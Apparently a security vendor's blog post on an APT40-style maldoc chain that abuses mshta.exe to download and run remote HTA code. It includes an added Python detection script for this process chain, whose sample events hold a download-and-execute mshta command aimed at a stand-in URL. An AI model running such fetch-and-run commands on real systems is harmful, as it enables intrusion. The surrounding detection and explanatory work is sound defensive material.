Our last release looked at the APT29 RNC hack and the use of AdFind to collect, compress, and exfiltrate files from a compromised host.
For this week’s TTP Tuesday we are releasing a new APT40 themed chain based on the use of multi-stage macro-enabled Office documents. These techniques, at the time used in concert with 0-days, are still relevant today and applicable to a wide audience.
MShta.exe is a Windows binary for executing HTML Application (HTA) files. MShta is a well-known LOLBin: an application or library that is included by default in an operating system and may be abused to execute arbitrary code or perform other actions. LOLBins are interesting because they allow attackers to perform certain actions using signed binaries and libraries that are routinely used for the normal behaviour of the host operating system. For an attacker, these binaries help evade detection: they fly under the radar of a blue team because of the large amount of data those teams routinely process. This week, we’re looking at how MShta can be used to download and execute code contained in an HTA file.
Malicious Office documents, or maldocs, are everywhere. APT40 used a maldoc that, in addition to circa 2017 0-days, used MShta.exe to download and execute an HTA file that would then download second stage malware.
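The chain described above (Office document spawning MShta.exe, MShta fetching a remote HTA, the HTA pulling down a second stage) leaves a distinctive process-creation trail. The following is an added detection example and is not code from the original post or from Prelude; it runs over constructed sample events shaped like Sysmon Event ID 1 fields (image, parent image, command line), and the field names, paths and the `example.invalid` URL are assumptions made for illustration.

```python
"""Detection logic for the Office -> mshta.exe -> second-stage chain.

Added example (not from the original post or from Prelude). The sample
events below are constructed; field names follow Sysmon Event ID 1
(process creation) by assumption.
"""
import re
from dataclasses import dataclass
from typing import List, Tuple

# Office parents that should not normally launch mshta.exe (assumed list).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# mshta.exe accepts a URL directly; a remote argument is the download-and-execute case.
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


@dataclass
class ProcEvent:
    image: str          # full path of the newly created process
    parent_image: str   # full path of the parent process
    command_line: str   # command line of the newly created process


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def mshta_findings(ev: ProcEvent) -> List[str]:
    """Return the detection reasons for one event; an empty list means benign."""
    reasons: List[str] = []
    img = basename(ev.image)
    parent = basename(ev.parent_image)
    if img == "mshta.exe":
        if parent in OFFICE_PARENTS:
            reasons.append(f"mshta.exe spawned by Office process {parent}")
        if URL_RE.search(ev.command_line):
            reasons.append("mshta.exe invoked with a remote URL (HTA download-and-execute)")
    elif parent == "mshta.exe":
        # The HTA stage launching anything else is the second-stage hand-off.
        reasons.append(f"mshta.exe launched child process {img} (possible second stage)")
    return reasons


def scan(events: List[ProcEvent]) -> List[Tuple[ProcEvent, List[str]]]:
    """Return only the events that triggered at least one reason."""
    flagged = []
    for ev in events:
        reasons = mshta_findings(ev)
        if reasons:
            flagged.append((ev, reasons))
    return flagged


# Constructed sample events: two malicious-looking, two benign.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\mshta.exe",
              r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r"mshta.exe http://example.invalid/stage1.hta"),
    ProcEvent(r"C:\Users\Public\update.exe",
              r"C:\Windows\System32\mshta.exe",
              r"C:\Users\Public\update.exe"),
    # A local HTA opened from Explorer is ordinary usage and must not fire.
    ProcEvent(r"C:\Windows\System32\mshta.exe",
              r"C:\Windows\explorer.exe",
              r'mshta.exe "C:\Users\alice\Documents\tool.hta"'),
    ProcEvent(r"C:\Windows\System32\notepad.exe",
              r"C:\Windows\explorer.exe",
              r"notepad.exe"),
]

if __name__ == "__main__":
    for ev, reasons in scan(SAMPLE_EVENTS):
        print(basename(ev.image), "<-", basename(ev.parent_image))
        for r in reasons:
            print("   ", r)
```

The third sample event is there on purpose: a user double-clicking a local HTA produces an mshta.exe process with no Office parent and no URL, so a rule keyed only on the image name would drown the Office-parent and remote-URL cases in noise. In a real deployment, the parent-process and command-line fields would come from your EDR or Sysmon feed rather than the constructed list.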
Our maldoc contains a couple of steps:
We’ve also conveniently broken out the MShta technique for use outside this maldoc.
Thanks for reading! We’ll be back next week with more examples of APT40 tradecraft!
Watch a demonstration: APT40 Defense Industry
Thanks for reading our latest TTP Tuesday release! Please subscribe and reach out with any feedback. We love to hear from our community!
There are several ways to follow us and learn more about Prelude and our team members:
Download Prelude Operator: https://www.prelude.org/download/current
See the latest kill chain and TTP Releases: https://chains.prelude.org/
See our open-source repositories: https://github.com/preludeorg
Listen to our Podcast: https://anchor.fm/preludeorg
Read our blog: https://feed.prelude.org
Watch our live streams: https://www.twitch.tv/preludeorg
Watch our pre-recorded content: https://www.youtube.com/c/preludeorg